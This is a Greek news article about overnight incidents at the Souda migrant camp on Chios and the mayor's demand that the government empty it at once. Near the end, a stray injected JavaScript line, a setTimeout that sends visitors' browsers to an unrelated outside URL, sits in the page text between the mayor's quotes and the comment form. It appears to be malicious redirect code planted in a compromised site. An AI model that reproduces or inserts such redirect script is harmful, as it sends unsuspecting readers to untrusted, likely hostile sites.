Χίος: Να αδειάσει άμεσα ο καταυλισμός της Σούδας (ΒΙΝΤΕΟ)

0
9

 

Ο φόβος και η αγωνία για κλιμάκωση των επεισοδίων έχει επισκιάσει την καθημερινότητα των πολιτών της Χίου, των οποίων τα σπίτια και οι περιουσίες γειτνιάζουν με τον καταυλισμό της Σούδας.

Τα όσα διαδραματίστηκαν τα ξημερώματα της Πέμπτης αποτελούν το κερασάκι της τούρτας για τους μόνιμους κατοίκους της περιοχής που βλέπουν τις περιουσίες τους να λεηλατούνται εξαιτίας της συστηματικής απουσίας του κράτους και της ανεπάρκειας ολοκληρωμένης πολιτικής για τη διαχείριση του μεταναστευτικού, όπως γράφει το politischios.gr.

Δεν είναι η πρώτη φορά, λένε, που γίνονται μάρτυρες επεισοδίων βλέποντας ακόμα και τα όργανα του κράτους να ολιγωρούν χρονικά ως προς την επέμβασή τους.

Από την πλευρά του ο δήμαρχος του νησιού Μανώλης Βουρνούς επεσήμανε την ανάγκη «σήμερα κιόλας να αδειάσει ο καταυλισμός στη Σούδα της Χίου».

«Μετά τα επεισόδια το βράδυ που πέρασε, έχει γίνει καθαρό ότι η κυβέρνηση πρέπει να αναλάβει τις ευθύνες της. Αν δεν μπορεί να κυβερνήσει, αυτό είναι πρόβλημα δικό της και όχι του δήμου. Δεν είναι δουλειά του δήμου να εξασφαλίσει την ασφάλεια των δημοτών αλλά και των προσφύγων -μεταναστών» τόνισε ο κ. Βουρνούς.

Ο δήμαρχος Χίου έκανε γνωστό ότι επικοινώνησε με τον υπουργό Μεταναστευτικής Πολιτικής, Γιάννη Μουζάλα, από τον οποίο και ζήτησε να αδειάσει άμεσα ο καταυλισμός της Σούδας. «Στο ερώτημά του «πού να τους πάω», του απάντησα αυτό είναι θέμα δικό σας και όχι δικό μου», είπε ο δήμαρχος.

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here